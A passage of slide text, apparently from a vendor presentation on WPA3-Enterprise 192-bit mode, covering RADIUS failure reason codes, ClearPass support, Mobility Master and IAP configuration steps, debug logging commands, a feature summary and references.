– RSA ≥ 3072-bit modulus
– DHE ≥ 3072-bit modulus
– WLAN-Reason-Code (Radius Attribute Type -185) is transmitted in Access-Response when EAP authentication fails indicating the appropriate reason code for failure.
Reason Code Name Meaning
18 REASON_INVALID_GROUP_CI PHER Invalid group cipher
19 REASON_INVALID_PAIRWISE _CIPHER Invalid pairwise cipher
20 REASON_INVALID_AKMP Invalid AKMP
23 802_1_X_AUTH_FAILED IEEE 802.1X authentication failed
24 REASON_CIPHER_OUT_OF_P OLICY Cipher suite rejected because of the security
policy(if group management cipher suite doesn't
match)
ClearPass 6.8 or later version
of CPPM does support WPA3-
Enterprise 192-Bit mode
81
Suite-B Probe Response
WPA3-Enterprise: Suite-B Probe Response
82
Suite-B client Association Request
WPA3-Enterprise: Suite-B Association Request
83
Suite-B auth-tracebuf
WPA3-Enterprise: Suite-B Auth-tracebuf
84
Tasks -> Create a new WLAN
Step1
Step2
Step3
Step4
Mobility Master WPA3-Enterprise Configuration
85
Create a new network
Step1
Step2
Step3
Step4
IAP WPA3-Enterprise Configuration
86
WPA3-EnterpriseLogging/Debugging
• Debugging or logs related to WPA2 opmode is valid for this.
• No new logging is introduced for this.
• logging security process authmgr level debugging
• logging security process authmgr subcat aaa level debugging
• logging user level debugging
87
WPA3-EnterpriseClient connectivity
– WPA3 Suiteb Capable client connects with required selectors.
– Association table flags the client as Enterprise client with 11w capability
88
Wi-Fi Protected Access® updateSummary
– WPA3™
– WPA3-SAE™ (mandatory)
– WPA3-Enterprise™ (mandatory)
– WPA3-Enterprise™ 192-Bit/Suite-B – (optional)
– 802.11w (mandatory)
– Verification of certificate chain checking
– Enhanced Open™
– Migration Open OWE (encryption by default)
– Encrypted walled gardens
– Combine with strong profiling
– Basic IoT, Guest, BYOD
– Easy Connect™
– A new way to connect headless devices, e.g. IoT
Thank [email protected]
90
References
– OWE
– Harkins, D. and W. Kumari, “Opportunistic Wireless Encryption”, RFC 8110, March 2017
– SAE
– IEEE 802.11-2016
– Harkins, D., “The Dragonfly Key Exchange”, RFC 7664, November 2015
– Suite B
– US National Security Agency, ”NSA Suite B Cryptography”, January 2009
– DPP
– Wi-Fi Alliance, “Device Provisioning Protocol Technical Specification” v0.2.8, December 2017
– Harkins, D. “The Public Key Exchange”, draft-harkins-pkex-05, January 2018
– Stejano, F, and A. Ross, “The Resurrecting Duckling”, Lecture Notes in Computer Science, vol 1796. Springer, Berlin, Heidelberg, 1999
– FILS
– IEEE 802.11ai-2016, “Amendment 1: Fast Initial Link Setup”, 2016
91
References
– https://wlan1nde.wordpress.com/2018/09/14/wpa3-improving-your-wlan-security/
– https://www.mathyvanhoef.com/2018/06/wpa3-missed-opportunity.html
– https://sarwiki.informatik.hu-berlin.de/WPA3_Dragonfly_Handshake
– http://andrea.corbellini.name/2015/05/17/elliptic-curve-cryptography-a-gentle-introduction/
